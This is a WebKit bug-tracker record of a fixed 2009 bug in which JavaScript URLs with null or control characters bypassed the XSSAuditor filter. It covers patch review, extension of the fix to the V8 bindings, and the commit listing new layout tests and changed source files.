RESOLVED FIXED 27151
[XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor
https://bugs.webkit.org/show_bug.cgi?id=27151
Daniel Bates
Reported 2009-07-10 11:16:17 PDT
Attachments
Patch with tests (10.74 KB, patch)
2009-07-10 11:20 PDT, Daniel Bates
abarth: review-
Updated patch with tests. (11.84 KB, patch)
2009-07-10 13:35 PDT, Daniel Bates
abarth: review+
Daniel Bates
Comment 1 2009-07-10 11:20:23 PDT
Created attachment 32565
Patch with tests
Adam Barth
Comment 2 2009-07-10 13:16:57 PDT
Comment on attachment 32565
Patch with tests

This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Daniel Bates
Comment 3 2009-07-10 13:35:23 PDT
Created attachment 32573
Updated patch with tests.

I made the changes in the V8 bindings, but how do I test it? Also, moved line "const String* savedSourceURL = m_sourceURL;" to its original place in file WebCore/bindings/js/ScriptController.cpp.
Adam Barth
Comment 4 2009-07-10 13:39:27 PDT
Comment on attachment 32573
Updated patch with tests.

This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the chromium build bot to make sure it works fine.
Daniel Bates
Comment 5 2009-07-10 13:41:16 PDT
Thanks.

(In reply to comment #4)
> (From update of attachment 32573)
> This looks good. To test the V8 bindings, you need a Chromium build. I'll
> watch the chromium build bot to make sure it works fine.
Adam Barth
Comment 6 2009-07-10 18:32:05 PDT
Sending LayoutTests/ChangeLog
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html
Adding LayoutTests/http/tests/security/xssAuditor/javascript-link.html
Adding LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl
Sending WebCore/ChangeLog
Sending WebCore/bindings/js/ScriptController.cpp
Sending WebCore/bindings/v8/ScriptController.cpp
Sending WebCore/page/XSSAuditor.cpp
Sending WebCore/page/XSSAuditor.h
Transmitting file data .............
Committed revision 45741.
http://trac.webkit.org/changeset/45741